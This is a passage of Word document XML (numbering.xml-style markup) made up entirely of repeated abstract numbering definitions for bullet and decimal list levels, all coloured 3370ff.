      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21100">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21101">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21102">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21103">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21104">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21105">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21106">
    <w:lvl>
      <w:start w:val="13"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21107">
    <w:lvl>
      <w:start w:val="14"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21108">
    <w:lvl>
      <w:start w:val="15"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21109">
    <w:lvl>
      <w:start w:val="16"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21110">
    <w:lvl>
      <w:start w:val="17"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21111">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21112">
    <w:lvl>
      <w:start w:val="18"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21113">
    <w:lvl>
      <w:start w:val="19"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21114">
    <w:lvl>
      <w:start w:val="20"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21115">
    <w:lvl>
      <w:start w:val="21"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21116">
    <w:lvl>
      <w:start w:val="22"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21117">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21118">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21119">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21120">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21121">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21122">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21123">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21124">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21125">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21126">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21127">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21128">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21129">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21130">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21131">
    <w:lvl>
      <w:start w:val="23"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21132">
    <w:lvl>
      <w:start w:val="24"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21133">
    <w:lvl>
      <w:start w:val="25"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21134">
    <w:lvl>
      <w:start w:val="26"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21135">
    <w:lvl>
      <w:start w:val="27"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21136">
    <w:lvl>
      <w:start w:val="28"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21137">
    <w:lvl>
      <w:start w:val="29"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21138">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21139">
    <w:lvl>
      <w:start w:val="30"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21140">
    <w:lvl>
      <w:start w:val="31"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21141">
    <w:lvl>
      <w:start w:val="32"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21142">
    <w:lvl>
      <w:start w:val="33"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21143">
    <w:lvl>
      <w:start w:val="34"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21144">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21145">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21146">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21147">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21148">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21149">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21150">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21151">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21152">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21153">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21154">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21155">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21156">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21157">
    <w:lvl>
      <w:start w:val="35"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21158">
    <w:lvl>
      <w:start w:val="36"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21159">
    <w:lvl>
      <w:start w:val="37"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21160">
    <w:lvl>
      <w:start w:val="38"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21161">
    <w:lvl>
      <w:start w:val="39"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21162">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21163">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21164">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21165">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21166">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21167">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21168">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21169">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21170">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21171">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21172">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21173">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21174">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21175">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21176">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21177">
    <w:lvl>
      <w:start w:val="40"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21178">
    <w:lvl>
      <w:start w:val="41"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21179">
    <w:lvl>
      <w:start w:val="42"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21180">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21181">
    <w:lvl>
      <w:start w:val="43"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21182">
    <w:lvl>
      <w:start w:val="44"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21183">
    <w:lvl>
      <w:start w:val="45"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21184">
    <w:lvl>
      <w:start w:val="46"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21185">
    <w:lvl>
      <w:start w:val="47"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21186">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21187">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21188">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21189">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21190">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21191">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21192">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21193">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21194">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21195">
    <w:lvl>
      <w:start w:val="48"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21196">
    <w:lvl>
      <w:start w:val="49"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21197">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21198">
    <w:lvl>
      <w:start w:val="50"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21199">
    <w:lvl>
      <w:start w:val="51"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21200">
    <w:lvl>
      <w:start w:val="52"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21201">
    <w:lvl>
      <w:start w:val="53"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21202">
    <w:lvl>
      <w:start w:val="54"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21203">
    <w:lvl>
      <w:start w:val="55"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
